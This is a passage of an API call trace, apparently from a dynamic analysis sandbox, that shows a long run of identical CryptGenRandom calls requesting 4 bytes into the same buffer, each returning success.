CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.421] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 